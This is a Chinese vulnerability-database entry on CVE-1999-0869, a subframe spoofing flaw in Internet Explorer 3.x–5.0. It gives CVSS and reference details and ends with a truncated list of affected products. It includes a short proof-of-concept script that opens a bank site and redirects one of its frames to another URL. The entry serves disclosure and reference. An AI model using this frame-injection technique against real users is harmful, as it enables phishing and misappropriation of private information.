Internet Explorer帧注入漏洞

Internet Explorer帧注入漏洞

漏洞ID 1105621 漏洞类型 未知
发布时间 1999-11-30 更新时间 1999-11-30
图片[1]-Internet Explorer帧注入漏洞-安全小百科CVE编号 CVE-1999-0869
图片[2]-Internet Explorer帧注入漏洞-安全小百科CNNVD-ID CNNVD-199812-007
漏洞平台 Windows CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/19662
https://www.securityfocus.com/bid/88094
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199812-007
|漏洞详情
InternetExplorer3.x至4.01版本存在漏洞。远程攻击者可以向另一网站的帧插入任意恶意内容,也称为帧欺骗。
|漏洞EXP
Internet Explorer 4.1 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 Subframe Spoofing Vulnerability

source: http://www.securityfocus.com/bid/855/info

IE's default security settings allow a malicious webpage to open a new browser, open another site's main frame in that new browser and then set any subframes to a URL of their choosing. This could lead to misappropriation of private information, among other problems. 

<SCRIPT>
b=window.open("http://www.citybank.com");
function g()
{
b.frames[2].location="http://www.yahoo.com";
}
setTimeout("g()",6000);
</SCRIPT>
|受影响的产品
Microsoft Internet Explorer 3.0.2 for Windows NT 4.0

Microsoft Windows NT 4.0

Microsoft Windows NT 4.0

Microsoft Internet Explorer 3.0.1 fo

|参考资料

来源:MS
名称:MS98-020
链接:http://www.microsoft.com/technet/security/bulletin/ms98-020.mspx

相关推荐: RSAREF Buffer Overflow Vulnerability

RSAREF Buffer Overflow Vulnerability 漏洞ID 1104496 漏洞类型 Boundary Condition Error 发布时间 1999-12-01 更新时间 1999-12-01 CVE编号 N/A CNNVD-ID…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享